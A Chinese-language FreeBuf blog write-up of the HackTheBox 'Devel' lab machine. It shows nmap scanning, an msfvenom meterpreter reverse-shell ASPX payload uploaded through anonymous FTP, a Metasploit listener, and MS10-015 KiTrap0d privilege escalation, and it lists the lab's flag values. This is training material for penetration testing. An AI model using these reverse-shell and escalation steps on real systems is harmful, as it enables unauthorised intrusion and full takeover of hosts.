freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

[Meachines] [Easy] Devel FTP匿名访问文件上传+MS10-015权限提升
maptnh 2024-08-21 10:38:44 37136

信息收集

IP AddressOpening Ports
10.10.10.5TCP:21,80

$ nmap -p- 10.10.10.5 --min-rate 1000 -sC -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

FTP & HTTP

通过ftp将aspx上传至网站

image.png

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=10032 -f aspx > shell.aspx

$ ftp 10.10.10.5

username:anonymous password:anonymous

ftp> put shell.aspx

image-1.png

$ msfconsole

msf6 > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set LHOST 10.10.16.24

msf6 exploit(multi/handler) > set LPORT 10032

msf6 exploit(multi/handler) > run

$ curl http://10.10.10.5/shell.aspx

image-2.png

权限提升 & MS10-015

> systeminfo

image-3.png

枚举潜在的权限提升漏洞

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester

image-4.png

msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d

msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1

msf6 exploit(windows/local/ms10_015_kitrap0d) > set lhost 10.10.16.24

image-5.png

MS10-015,也被称为 Kitrap0d,是一个Windows内核漏洞,它的编号是 CVE-2010-0232。这个漏洞是由于Windows操作系统中的一个特权提升漏洞引发的。具体来说,漏洞出现在Windows内核中的一个不正确的特权检查机制,使得攻击者能够通过特殊的代码在内核模式下执行任意代码,从而提升权限。

漏洞形成原因:
不正确的特权检查:
Windows操作系统中的CSRSS(Client/Server Runtime Subsystem)进程具有较高的权限。该漏洞存在于Windows内核处理特定系统调用时的方式中。当用户模式下的进程请求特权操作时,内核没有正确地验证调用的上下文(例如,某些调用是否来自具有足够权限的进程)。

系统调用的操作权限被绕过:
漏洞利用了系统调用(syscall)过程中错误的权限检查机制。攻击者可以通过创建一个特制的请求,使得系统误认为低权限的进程拥有高权限,并允许该进程执行通常只有系统级别权限才能执行的操作。

特权提升:
由于上述原因,攻击者可以从用户模式提升到内核模式,并执行任意代码。这意味着攻击者可以从标准用户帐户获得系统权限,进而完全控制受影响的系统。

User.txt

a6a2e101fcf3865491bd4521eb1f84fc

Root.txt

626f13a715fb1239018637d32592db59

# web安全 # CTF
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 maptnh 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
HackTheBox
maptnh LV.9
Ценность жизни выше, чем кража данных.
  • 344 文章数
  • 64 关注者
[CISSP] [9] 安全漏洞,威胁和对策
2025-04-09
[CISSP] [8] 安全模型,设计和能力的原则
2025-04-09
[CISSP] [7] PKI和密码应用
2025-04-03
文章目录